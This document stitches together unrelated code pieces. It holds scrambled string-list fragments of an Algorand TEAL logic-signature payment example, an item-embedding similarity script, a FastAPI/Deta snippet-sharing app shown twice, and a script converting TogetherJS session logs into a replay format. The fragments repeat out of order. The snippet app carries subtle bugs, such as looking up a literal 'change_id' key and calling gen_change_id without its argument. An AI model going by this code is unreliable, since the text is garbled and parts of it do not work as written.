algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except", "algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function", "used in production # // samplearg.teal # arg_0 # btoi # int 123", "client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token,", "# // Pops: ... 
stack, []byte # // Pushes: uint64 # // converts", "= transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to", "arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks #", "= None # Create a transaction txn = PaymentTxn( sender, params, receiver, amount,", "response['hash']) # Create logic sig programstr = response['result'] t = programstr.encode() program =", "= client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try:", "int 123 # == # // bto1 # // Opcode: 0x17 # //", "response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str", "TEAL program # // This code is meant for learning purposes only #", "lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment out the next", "closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig)", "LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the", "// It should not be used in production # // samplearg.teal # arg_0", "print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash']) # Create logic", "// Opcode: 0x17 # // Pops: ... stack, []byte # // Pushes: uint64", "endian to uint64 # // btoi panics if the input is longer than", "= base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\" # arg1", "= \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL", "# string parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode() #", "Get suggested parameters params = algod_client.suggested_params() # Comment out the next two (2)" ]
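# --- A minimal sketch (not part of the sample above) of the byte/uint64
# round-trip that TEAL's `btoi` opcode performs on arg_0: the SDK passes the
# argument as 8 big-endian bytes, and on-chain `btoi` decodes them back to
# the uint64 that the program compares against `int 123`.
arg = (123).to_bytes(8, 'big')             # b'\x00\x00\x00\x00\x00\x00\x00{'
assert int.from_bytes(arg, 'big') == 123   # the value `btoi` pushes on-chain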
<reponame>whz-NJ/PersonalRecommendation
#-*-coding:utf8-*-
"""
author:zhiyuan
date:2019
produce item sim file
"""
import os
import numpy as np
import operator
import sys


def load_item_vec(input_file):
    """
    Args:
        input_file: item vec file
    Return:
        dict key:itemid value:np.array([num1, num2....])
    """
    if not os.path.exists(input_file):
        return {}
    linenum = 0
    item_vec = {}
    fp = open(input_file)
    for line in fp:
        if linenum == 0:
            # skip the word2vec-style header line
            linenum += 1
            continue
        item = line.strip().split()
        if len(item) < 129:
            continue
        itemid = item[0]
        if itemid == "</s>":
            continue
        item_vec[itemid] = np.array([float(ele) for ele in item[1:]])
    fp.close()
    return item_vec


def cal_item_sim(item_vec, itemid, output_file):
    """
    Args:
        item_vec: item embedding vector
        itemid: fixed itemid to calc item sim
        output_file: the file to store result
    """
    if itemid not in item_vec:
        return
    score = {}
    topk = 10
    fix_item_vec = item_vec[itemid]
    for tmp_itemid in item_vec:
        if tmp_itemid == itemid:
            continue
        tmp_itemvec = item_vec[tmp_itemid]
        fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec)
        if fenmu == 0:
            score[tmp_itemid] = 0
        else:
            score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec) / fenmu, 3)
    fw = open(output_file, "w+")
    out_str = itemid + "\t"
    tmp_list = []
    # rank candidate items by cosine similarity and keep the top-k
    for zuhe in sorted(score.items(), key=operator.itemgetter(1), reverse=True)[:topk]:
        tmp_list.append(zuhe[0] + "_" + str(zuhe[1]))
    out_str += ";".join(tmp_list)
    fw.write(out_str + "\n")
    fw.close()


def run_main(input_file, output_file):
    item_vec = load_item_vec(input_file)
    cal_item_sim(item_vec, "27", output_file)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("usage: python xx.py inputfile outputfile")
        sys.exit()
    else:
        inputfile = sys.argv[1]
        outputfile = sys.argv[2]
        run_main(inputfile, outputfile)
    #run_main("../data/item_vec.txt", "../data/sim_result.txt")
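# --- A vectorized sketch of the same cosine ranking as cal_item_sim() above.
# Not part of the original script: cal_item_sim_fast and its topk parameter
# are illustrative names, and it assumes load_item_vec()'s output format.
import numpy as np

def cal_item_sim_fast(item_vec, itemid, topk=10):
    if itemid not in item_vec:
        return []
    ids = [tid for tid in item_vec if tid != itemid]
    if not ids:
        return []
    mat = np.stack([item_vec[tid] for tid in ids])        # (n, dim) matrix
    fix = item_vec[itemid]
    fenmu = np.linalg.norm(mat, axis=1) * np.linalg.norm(fix)
    safe = np.where(fenmu == 0, 1.0, fenmu)               # avoid divide-by-zero
    scores = np.where(fenmu == 0, 0.0, mat.dot(fix) / safe)
    order = np.argsort(-scores)[:topk]
    return [(ids[i], round(float(scores[i]), 3)) for i in order]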
import secrets, string
from deta.lib import App, Database
from fastapi.responses import HTMLResponse
from deta.lib.responses import JSON
from fastapi import FastAPI, Response
from fastapi.middleware.cors import CORSMiddleware
from passlib.context import CryptContext
from pydantic import BaseModel, Field
from jinja2 import Template

# This is a regular FastAPI app. Read the docs of FastAPI:
# https://fastapi.tiangolo.com/
# suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030
# review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775
# main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512
# snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460
# main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045
# README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883

fast = FastAPI()
app = App(fast)
snippets = Database("snippets")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")


def verify_password(plain_password, hashed_password):
    return pwd_context.verify(plain_password, hashed_password)


def get_password_hash(password):
    return pwd_context.hash(password)


def get_snippet(snip_id):
    try:
        snippet = snippets.get(snip_id)["data"]
        return snippet
    except KeyError:
        return None


@app.lib.run("snipper")
def snip_handler(event):
    key = event.json.get("key")
    val = get_snippet(key)
    return val


def gen_id():
    alpha = "".join(secrets.choice(string.ascii_lowercase) for i in range(4))
    digits = "".join(secrets.choice(string.digits) for i in range(4))
    key = f"{alpha}-{digits}"
    if get_snippet(key):
        return gen_id()
    return key


def get_change(snippet_id, change_id):
    try:
        changes = snippets.get(snippet_id)["data"]["proposed_changes"]
        change = changes[change_id]
        return change
    except KeyError:
        return None


def gen_change_id(snippet_id):
    alpha = "".join(secrets.choice(string.ascii_lowercase) for i in range(2))
    digits = "".join(secrets.choice(string.digits) for i in range(2))
    key = f"{alpha}{digits}"
    if get_change(snippet_id, key):
        return gen_change_id(snippet_id)
    return key


class Snippet(BaseModel):
    name: str
    code: str
    # default_factory: generate a fresh id for each new snippet
    snip_id: str = Field(default_factory=gen_id)
    proposed_changes: dict = {}
    history: list = []
    password: str = "<PASSWORD>"


class Password(BaseModel):
    password: str


class SnipInDB(Snippet):
    hashed_password: str


class Change(BaseModel):
    code: str


def authenticate_merge(snip_id: str, password: str):
    snippet = get_snippet(snip_id)
    if not snippet:
        return False
    else:
        snippet = SnipInDB(**snippet)
        if not verify_password(password, snippet.hashed_password):
            return False
        return True


@app.get("/")
def main_handler():
    main = open("main.html").read()
    return HTMLResponse(main)


@app.get("/snipz.css")
def css_handler():
    css = open("snipz.css").read()
    return Response(content=css, media_type="text/css")


@app.post("/create_snippet")
async def make_snippet(new_snip: Snippet):
    snip_dict = new_snip.dict()
    snip_dict["hashed_password"] = get_password_hash(new_snip.password)
    del snip_dict["password"]
    snippets.put(new_snip.snip_id, snip_dict)
    del snip_dict["hashed_password"]
    return Snippet(**snip_dict)


@app.get("/snippets/{snippet_id}")
async def show_snippet(snippet_id: str):
    try:
        suggest_template = Template(open("suggest.html").read())
        snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
        return HTMLResponse(suggest_template.render(snippet_data=snippet))
    except KeyError:
        return {"error": "no such snippet"}


@app.post("/snippets/{snippet_id}/changes")
async def suggest_change(snippet_id: str, change: Change):
    try:
        snippet = SnipInDB(**snippets.get(snippet_id)["data"])
        snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict()
        snippets.put(snippet_id, snippet.dict())
        return Snippet(**snippet.dict())
    except KeyError:
        return {"error": "no such snippet"}


@app.get("/snippets/{snippet_id}/review")
async def review_snippet(snippet_id: str):
    try:
        review_template = Template(open("review.html").read())
        snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
        return HTMLResponse(review_template.render(snippet_data=snippet))
    except KeyError:
        return {"error": "no such snippet"}


@app.patch("/snippets/{snippet_id}/merge/{change_id}")
async def merge_change(snippet_id: str, change_id: str, password: Password):
    if not authenticate_merge(snippet_id, password.password):
        return {"error": "Invalid merge password"}
    try:
        snippet = SnipInDB(**snippets.get(snippet_id)["data"])
        change = Change(**snippet.proposed_changes[change_id])
        snippet.history.append(snippet.code)
        snippet.code = change.code
        del snippet.proposed_changes[change_id]
        snippets.put(snippet_id, snippet.dict())
        return Snippet(**snippet.dict())
    except KeyError:
        return {"error": "no such snippet"}


@app.lib.run()
def handler(event):
    return len(snippets.all())


@app.lib.run(action="del_snip")
def handler(event):
    ...
Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 #", "def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except", "event.json.get(\"key\") val = get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i", "@app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] =", "name: str code: str snip_id: str = gen_id() proposed_changes: dict = {} history:", "False return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def", "Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet =", "change = changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id): alpha =", "= new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict)", "key class Snippet(BaseModel): name: str code: str snip_id: str = gen_id() proposed_changes: dict", "# snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app", "in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def get_change(snippet_id,", "i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def", "KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return", "= get_snippet(snip_id) if not snippet: return False else: snippet = SnipInDB(**snippet) if not", "snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\")", "snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\")", "= \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2))", "snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id): alpha", "deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id):", "return change except KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i", "JSON from fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import", "authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet = 
SnipInDB(**snippets.get(snippet_id)[\"data\"]) change =", "import BaseModel from jinja2 import Template # This is a regular FastAPI app.", "authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if not snippet: return False else:", "a regular FastAPI app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html:", "snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def", "review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md:", "gen_id() return key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"]", "snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try:", "snippet = get_snippet(snip_id) if not snippet: return False else: snippet = SnipInDB(**snippet) if", "snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password)", "@app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id = event.json[\"snip_id\"] snippets.delete(snip_id) return", "{\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id", "\"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password: Password): if", "deta.lib import App, Database from fastapi.responses import HTMLResponse from deta.lib.responses import JSON from", "snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template =", "= Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except", "SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str): snippet", "get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name: str code: str snip_id:", "return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password:", "def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except", "try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\":", "jinja2 import Template # This is a regular FastAPI app. 
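
# --------------------------------------------------------------------------
# Illustrative sketch (not part of the original app): a quick round-trip
# through the password helpers above. This function is never called by the
# app; the plaintext value is a made-up example.
def _demo_password_roundtrip():
    hashed = get_password_hash("hunter2")
    assert verify_password("hunter2", hashed)
    assert not verify_password("wrong-guess", hashed)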
@app.get("/")
def main_handler():
    main = open("main.html").read()
    return HTMLResponse(main)


@app.get("/snipz.css")
def css_handler():  # renamed from a second `main_handler` to avoid shadowing
    css = open("snipz.css").read()
    return Response(content=css, media_type="text/css")


@app.post("/create_snippet")
async def make_snippet(new_snip: Snippet):
    snip_dict = new_snip.dict()
    # store only the bcrypt hash, never the plaintext password
    snip_dict["hashed_password"] = get_password_hash(new_snip.password)
    del snip_dict["password"]
    snippets.put(new_snip.snip_id, snip_dict)
    del snip_dict["hashed_password"]
    return Snippet(**snip_dict)


@app.get("/snippets/{snippet_id}")
async def show_snippet(snippet_id: str):
    try:
        suggest_template = Template(open("suggest.html").read())
        snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
        return HTMLResponse(suggest_template.render(snippet_data=snippet))
    except KeyError:
        return {"error": "no such snippet"}


@app.post("/snippets/{snippet_id}/changes")
async def suggest_change(snippet_id: str, change: Change):
    try:
        snippet = SnipInDB(**snippets.get(snippet_id)["data"])
        snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict()
        snippets.put(snippet_id, snippet.dict())
        return Snippet(**snippet.dict())
    except KeyError:
        return {"error": "no such snippet"}


@app.get("/snippets/{snippet_id}/review")
async def review_snippet(snippet_id: str):
    try:
        review_template = Template(open("review.html").read())
        snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
        return HTMLResponse(review_template.render(snippet_data=snippet))
    except KeyError:
        return {"error": "no such snippet"}


@app.patch("/snippets/{snippet_id}/merge/{change_id}")
async def merge_change(snippet_id: str, change_id: str, password: Password):
    if not authenticate_merge(snippet_id, password.password):
        return {"error": "Invalid merge password"}
    try:
        snippet = SnipInDB(**snippets.get(snippet_id)["data"])
        change = Change(**snippet.proposed_changes[change_id])
        snippet.history.append(snippet.code)
        snippet.code = change.code
        del snippet.proposed_changes[change_id]
        snippets.put(snippet_id, snippet.dict())
        return Snippet(**snippet.dict())
    except KeyError:
        return {"error": "no such snippet"}


@app.lib.run()
def handler(event):
    return len(snippets.all())


@app.lib.run(action="del_snip")
def del_snip_handler(event):  # renamed from a second `handler` to avoid shadowing
    snip_id = event.json["snip_id"]
    snippets.delete(snip_id)
    return len(snippets.all())
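
# --------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original app): how an HTTP
# client might walk the create -> suggest -> merge flow above. The base_url
# is hypothetical, `requests` is an assumed extra dependency, and this
# function is never called by the app itself.
def _demo_client_flow(base_url="https://example.deta.dev"):
    import requests

    # create a snippet; the server strips the password and stores its hash
    snip = requests.post(f"{base_url}/create_snippet",
                         json={"name": "demo", "code": "print('hi')",
                               "password": "s3cret"}).json()
    snip_id = snip["snip_id"]

    # anyone can propose a change to the snippet's code
    requests.post(f"{base_url}/snippets/{snip_id}/changes",
                  json={"code": "print('hello')"})

    # the owner merges a proposed change by supplying the snippet password;
    # a real change_id would come from the snippet's proposed_changes dict
    change_id = "ab12"  # hypothetical
    requests.patch(f"{base_url}/snippets/{snip_id}/merge/{change_id}",
                   json={"password": "s3cret"})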
# This script converts a codechella session log recorded by
# ../../v3/opt_togetherjs/server.js
#
# and turns it into the codcast format, which is readable by
# ../js/recorder.ts and ../js/demovideo.ts
#
# writes JSON output to stdout
# created: 2018-05-27

'''
NB: now that i think about it more, it's not entirely clear to me whether
you can always tell who initiated an app.editCode event with any kind of
certainty. oh wells, throw up our hands for nows.

NB: one big challenge is that some types of events are duplicated (or
repeated N times if there are N people in the session) since TogetherJS
logs everyone's actions separately
- app.editCode events are DEFINITELY duplicated
- app.hashchange events might also be duplicated
  - maybe ONLY take hashchange events for YOURSELF?

HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY
EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS
MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!!
- the solution to ... run the code on the actual server to generate a real
  trace for the trace cache; we need to essentially create a python-based
  ... to make the proper calls to the various OPT backends, depending on
  language

TODOs:
- not sure how much hashchange events matter
- maybe we can use app.executeCode events as 'sync points' since we know
  that the code in the editor contains those contents when they execute
'''
from collections import defaultdict
import dateutil.parser
import json
import os
import sys
import time

from call_opt_backend import call_opt_backend

# somewhat modeled after ../js/demovideo.ts
ALL_LEGIT_TYPES = (
    'app.initialAppState',
    'hello',
    'peer-update',
    'form-update',
    'cursor-update',
    'chat',
    'app.editCode',
    'app.executeCode',
    'app.updateOutput',
    'app.aceChangeCursor',
    'app.aceChangeSelection',
    'pyCodeOutputDivScroll',
    'app.hashchange',
)

# TODO: maybe we don't need this since TogetherJS will take care of
# mapping clientId's to usernames for us ...
#
# Key: clientId, Value: current username (might change throughout the
# session; keep the latest one)
clientIdtoUsername = {}

firstInitialAppState = None
firstClientId = None
raw_events = []

# Key: delta 'd' field, value: list of code edit events with that same 'd'
#
# NB: this won't be fully accurate if there are several *independent*
# sets of edits occurring at vastly different times which have the same 'd'
all_code_edits_by_deltas = defaultdict(list)

for line in open(sys.argv[1]):
    rec = json.loads(line)
    if rec['type'] != 'togetherjs':
        continue
    tjs = rec['togetherjs']
    typ = tjs['type']
    if typ not in ALL_LEGIT_TYPES:
        continue

    # read only the FIRST initialAppState since we'll assume that's who
    # initiated the session
    if not firstInitialAppState and typ == 'app.initialAppState':
        firstInitialAppState = rec
        firstClientId = tjs['clientId']

    # don't append any initialAppState events:
    if typ == 'app.initialAppState':
        continue

    if typ == 'app.editCode':
        all_code_edits_by_deltas[tjs['delta']['d']].append(tjs)

    # it's really tricky to log editCode events since they often appear as
    # duplicates (or even more copies if there are more people in the
    # session). the easiest way to manage it is to record only editCode
    # events belonging to the firstClientId user and discard all other ones.
    if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId:
        continue

    # ...do the same with hashchange: log them only for the firstClientId user
    # (note: the original compared against 'hashchange', which can never
    # match here since only 'app.hashchange' passes the ALL_LEGIT_TYPES filter)
    if typ == 'app.hashchange' and firstClientId and tjs['clientId'] != firstClientId:
        continue

    raw_events.append(rec)
    #if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']:
    #    assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t']
    #    continue # get outta here!
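
# --------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): a self-contained
# demo of the delta-deduplication idea used above. The event dicts are
# hypothetical minimal stand-ins for real TogetherJS app.editCode records.
def _demo_delta_dedup():
    fake_edits = [
        {'clientId': 'alice', 'delta': {'d': 'abc', 't': 100}},
        {'clientId': 'bob',   'delta': {'d': 'abc', 't': 150}},  # duplicate broadcast
        {'clientId': 'alice', 'delta': {'d': 'xyz', 't': 300}},
    ]
    by_delta = defaultdict(list)
    for ev in fake_edits:
        by_delta[ev['delta']['d']].append(ev)
    # attribute each duplicate to whoever produced the FIRST copy of a delta
    for ev in fake_edits:
        ev['clientId'] = by_delta[ev['delta']['d']][0]['clientId']
    assert all(ev['clientId'] == 'alice' for ev in fake_edits)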

events = []
for e in raw_events:
    tjs = e['togetherjs']
    # clean up and append to final events
    dt = dateutil.parser.parse(e['date'])
    # get timestamp in milliseconds
    ms = int(time.mktime(dt.timetuple())) * 1000

    # for app.codeEdit events, look up who the ORIGINAL PERSON was who
    # initiated this edit event, and log their clientId, which may be
    # different than your own clientId
    if tjs['type'] == 'app.editCode':
        d = tjs['delta']['d']
        t = tjs['delta']['t']
        assert d in all_code_edits_by_deltas
        firstEdit = all_code_edits_by_deltas[d][0]
        firstEditTimestamp = firstEdit['delta']['t']
        # sanity check: note that this will fail if we have multiple
        # identical sets of edits that take place at vastly
        # different points in time, but let's cross that bridge when
        # we get to it
        assert firstEditTimestamp <= t
        assert t - firstEditTimestamp < 5000 # give it a 5-second buffer for sanity checking
        tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event!

    # add these fields to match codcast format
    tjs['ts'] = ms
    tjs['sameUrl'] = True
    tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary
    # TODO: we need to add frameNum field later on; or maybe just add it here?!?
    events.append(tjs)

# each element of myTraceCache is a pair of [appState, cached trace from server]
myTraceCache = []
for e in events:
    if e['type'] == 'app.executeCode':
        myAppState = e['myAppState']
        r = call_opt_backend(myAppState)
        #print(r.url)
        serverResultJson = r.json()
        if 'trace' in serverResultJson:
            myTrace = serverResultJson['trace']
            myTraceCache.append([myAppState, myTrace])
        else:
            print("ERROR while running", myAppState, '->', serverResultJson,
                  file=sys.stderr)

initialAppState = firstInitialAppState['togetherjs']['myAppState']
initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it

firstDt = dateutil.parser.parse(firstInitialAppState['date'])
firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds

# prepend a special app.startRecordingDemo event to events
startRecordingDemoEvent = {'type': 'app.startRecordingDemo',
                           'clientId': firstInitialAppState['togetherjs']['clientId'],
                           'ts': firstTs,
                           'sameUrl': True,
                           'peer': {'color': '#8d549f'}} # not sure if this is necessary
events.insert(0, startRecordingDemoEvent)

# ok finally produce the codcast object and write it out to stdout as JSON
codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache': myTraceCache}
print(json.dumps(codcastObj))
events.append(tjs) # each element", "session log recorded by # ../../v3/opt_togetherjs/server.js # # and turns it into the", "edit events with that same 'd' # # NB: this won't be fully", "# created: 2018-05-27 ''' NB: now that i think about it more, it's", "# add these fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] =", "check: note that this will fail if we have multiple # identical sets", "code on the actual server to generate a real trace for the trace", "as 'sync points' since we know that the code in the editor contains", "the code on the actual server to generate a real trace for the", "# Key: clientId, Value: current username (might change throughout the # session; keep", "duplicates (or even more copies if there are more people in the session).", "\"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] #", "actual server to generate a real trace for the trace cache; we need", "'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if", "app.hashchange events might also be duplicated - maybe ONLY take hashchange events for", "os import sys import time from call_opt_backend import call_opt_backend # somewhat modeled after", "to stdout # created: 2018-05-27 ''' NB: now that i think about it", "which may be # different than your own clientId if tjs['type'] == 'app.editCode':", "mapping clientId's to usernames for us ... # # Key: clientId, Value: current", "different points in time, but let's cross that bridge when # we get", "'d' # # NB: this won't be fully accurate if there are several", "them only for the firstClientId user if typ == 'hashchange' and firstClientId and", "it assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 # give", "assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check:", "even more copies if there are more people in the session). # the", "clear to me whether you can always tell who initiated an app.editCode event", "FIRST initialAppState since we'll assume that's who # initiated the session if not", "all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this", "= rec firstClientId = tjs['clientId'] # don't append any initialAppState events: if typ", "each element of myTraceCache is a pair of [appState, cached trace from server]", "trace for the trace cache; we need to essentially create a python-based driver", "initiated an app.editCode event with any kind of certainty. oh wells, throw up", "tjs['clientId'] != firstClientId: continue # ...do the same with hashchange: log them only", "for this event! # add these fields to match codcast format tjs['ts'] =", "'peer': {'color': '#8d549f'}} # not sure if this is necessary events.insert(0, startRecordingDemoEvent) #", "with that same 'd' # # NB: this won't be fully accurate if", "we need to essentially create a python-based driver (maybe using requests) to make", "this will fail if we have multiple # identical sets of edits that", "assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! 
events = []", "have multiple # identical sets of edits that take place at vastly #", "serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson", "sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast", "of myTraceCache is a pair of [appState, cached trace from server] myTraceCache =", "milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo',", "vastly # different points in time, but let's cross that bridge when #", "e['togetherjs'] # clean up and append to final events dt = dateutil.parser.parse(e['date']) #", "to the various OPT backends, depending on language TODOs: - not sure how", "server] myTraceCache = [] for e in events: if e['type'] == 'app.executeCode': myAppState", "PERSON was who # initiated this edit event, and log their clientId, which", "up our hands for nows. NB: one big challenge is that some types", "# it's really tricky to log editCode events since they often appear as", "= [] # Key: delta 'd' field, value: list of code edit events", "firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same with hashchange: log", "= dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special", "as # duplicates (or even more copies if there are more people in", "assert t - firstEditTimestamp < 5000 # give it a 5-second buffer for", "which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec", "= {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} #", "who the ORIGINAL PERSON was who # initiated this edit event, and log", "can always tell who initiated an app.editCode event with any kind of certainty.", "an app.editCode event with any kind of certainty. 
